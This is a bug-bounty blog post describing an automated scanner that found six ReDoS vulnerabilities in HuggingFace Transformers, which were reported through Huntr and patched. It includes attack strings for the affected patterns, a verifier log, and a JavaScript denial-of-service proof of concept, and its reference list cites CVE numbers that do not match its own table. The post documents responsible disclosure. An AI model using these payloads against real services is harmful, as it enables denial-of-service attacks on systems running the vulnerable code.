6 CVEs and $750: Automating ReDoS Vulnerability Discovery with AI
The idea started while browsing Huntr’s hacktivity feed. I saw a ReDoS vulnerability reported in HuggingFace Transformers and wondered how many more might be hiding in there. Manually reviewing regex patterns sounded tedious and I only have the attention span of a Skink, so naturally I spent time building a tool to avoid doing it myself. That laziness paid off — 6 CVEs and $750, to be exact.
What Even is ReDoS?#
Before we dive in, let me explain what ReDoS (Regular Expression Denial of Service) is for the uninitiated.
Regular expressions (regex) are those cryptic strings that look like your cat walked across your keyboard, but they’re actually incredibly useful for pattern matching. The problem? Some regex patterns are written in ways that cause the regex engine to go on an existential crisis when given certain inputs.
Here’s a classic evil regex:
pattern = r'(a+)+$'
I mean what could go wrong here? Try matching this against the string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" and watch your CPU scream for mercy.
What happens is catastrophic backtracking — the regex engine tries to match the pattern, fails, backtracks, tries again, fails, backtracks… you get the idea. The time complexity can be exponential, meaning a carefully crafted string can freeze your server for hours. Or forever.
The Grand Plan#
I had this idea: what if I could automatically scan codebases for vulnerable regex patterns? Sounds simple enough, but regex parsing is surprisingly hard. There are ReDoS detection tools out there like redos-checker and recheck that tell you if a regex is vulnerable and even provides an attack string. I only needed some way to parse the regexes in the codebase and feed those into a detection tool.
So I did what any brain-rotted developer does in this Dystopian Intelligence Era — outsourced my thinking to ChatGPT.
Together, we built two main scripts:
1. The Scanner (scanner.py)#
This script:
- Walks through a project directory
- Finds all Python and JavaScript/TypeScript files
- Extracts regex patterns from functions like
re.compile(),re.match(),re.findall(),new RegExp(), and literal/pattern/syntax - Pipes each pattern through recheck
Here’s a snippet of the regex extraction logic for Python (the actual script is about 350 lines):
# Find re.compile() patterns
compile_pattern = r're\.compile\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})\s*(?:,\s*(?:re\.)?([A-Z|\s\|]*))?\s*\)'
# Find re.search(), re.match(), etc.
re_funcs = r'(?:search|match|findall|finditer|split|fullmatch)'
re_func_pattern = f're\.{re_funcs}\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})'
Yes, I’m using regex to find regex. We’ve gone full inception. Leonardo DiCaprio would be proud.
2. The Verifier (verify.py)#
The scanner can have false positives, so the verifier script:
- Parses the scanner output
- Takes each “vulnerable” pattern and its attack string
- Actually runs the attack in a controlled environment using Node.js
- If the regex takes longer than 10 seconds to execute — boom, confirmed vulnerability
The Hunt: Transformers Edition#
With my shiny new scanner ready, I needed a target. HuggingFace’s Transformers library was perfect:
- Huge codebase with tons of regex
- Critical infrastructure for the AI/ML community
- Covered by Huntr.com ’s bug bounty program
I pointed my scanner at the Transformers repo and let it rip:
$ python3 scanner.py transformers/ | tee scan-result-transformers.txt
Found 1049 regex pattern(s) in 397 file(s):
# ... rest of the 8000 lines of the output ...
$ python3 verify.py scan-result-transformers.txt
Found 38 potentially vulnerable patterns
Testing regex: /<.*?>/
Attack string: '<'.repeat(54773) + '\n<>'
[VULNERABLE] Pattern took longer than 10 seconds to complete
--------------------------------------------------------------------------------
Testing regex: /config\.(.*)\.json/
Attack string: 'jsonconfig.f'.repeat(15812) + 'json'
[VULNERABLE] Pattern took longer than 10 seconds to complete
--------------------------------------------------------------------------------
# ... more patterns tested ...
The feeling of seeing [VULNERABLE] pop up in red after a 10 second hang was oddly satisfying. The laziness indeed paid off.
A few minutes later, I had a treasure map of vulnerable patterns. Out of all the findings, I selected and verified 6 distinct vulnerabilities with real impact potential. Now came the tedious part — writing up reports on Huntr for each of them😵💫.
The Vulnerabilities#
Here’s what I found:
| CVE | Location | Pattern | Report |
|---|---|---|---|
| CVE-2025-3263 | configuration_utils.py
|
config\.(.*)\.json |
Report link |
| CVE-2025-3264 | dynamic_module_utils.py
|
Nested try/except blocks |
Report link |
| CVE-2025-3933 | processing_donut.py
|
<s_(.*?)> |
Report link |
| CVE-2025-5197 | modeling_tf_pytorch_utils.py
|
/[^/]*___([^/]*)/ |
Report link |
| CVE-2025-6051 | number_normalizer.py
|
Long sequence of digits | Report link |
| CVE-2025-6638 | tokenization_marian.py
|
>>.+<< |
Report link |
Each of these patterns could freeze a process when given a malicious input. In a production environment where Transformers is used to process user inputs (think chatbots, model loading from untrusted sources, etc.), these could be weaponized for Denial of Service attacks.
The Payday#
I reported all 6 vulnerabilities through Huntr.com , which is like HackerOne but specifically for AI/ML and open source projects.
The process was smooth:
- Submit the vulnerability report with PoC
- Wait for triage (usually a few days)
- Get confirmation and CVE assignment
- 💰
Final count:
- 6 vulnerabilities reported
- 6 CVEs assigned
- $750 in bounties ($125 each)
- 1 very happy me
Not bad for a few hours of work. Although, let’s be honest, the real hours went into reporting the vulnerabilities. But that’s how it is.
Sample Attack#
Here’s one of the simpler attack strings:
const regex = /config\.(.*)\.json/;
const payload = "jsonconfig.f".repeat(158120) + "json";
console.time("DoS started");
payload.match(regex); // This will take FOREVER
console.timeEnd("DoS ended");
This is what it feels like to be a frozen server.
What I Learned#
1. Automation is king. Manually auditing thousands of regex patterns would have taken weeks. The scanner did it in minutes.
2. AI is a force multiplier. ChatGPT helped me iterate on the scanner logic incredibly fast. It’s making us more effective (and a bit more dangerous). But AI is a double-edged sword, imagine Claude-generated code for critical features being shipped without proper testing.
3. Big projects have low-hanging fruit. You’d think a project maintained by a billion-dollar company would be squeaky clean. Nope. The attack surface is just too large.
4. ReDoS is underrated. It’s not as glamorous as RCE or SQLi, but when your ML inference server gets frozen because someone uploaded a sneaky model config file, you’ll wish you took regex security seriously.
The Tools#
If you want to try this yourself, here’s what you need:
- recheck — The ReDoS detection engine
- A target — Pick any large open source project and go hunting
- Patience — Not every finding is exploitable in practice
Closing Thoughts#
This was a fun project. I got to combine my love for security research, automation, and AI while making some money on the side. The best part? Those 6 vulnerabilities are now patched, making Transformers safer for everyone who uses it.
Props to the HuggingFace team for quick fixes and being responsive throughout. And if you’re thinking of trying this yourself — go for it, there’s no shortage of targets.
If you’re interested in this kind of work, the barrier to entry is lower than you’d think. Some curiosity, a little patience, and a target — you’re already thinking all the time, why not put it into something like this?
Thanks for reading!
References#
- CVE-2025-3262 - NVD
- CVE-2025-1194 - NVD
- CVE-2025-6051 - NVD
- CVE-2025-5197 - NVD
- CVE-2025-3933 - NVD
- CVE-2025-3263 - NVD
- Huntr.com — AI/ML Bug Bounty Platform
- recheck — ReDoS Detection Tool
- HuggingFace Transformers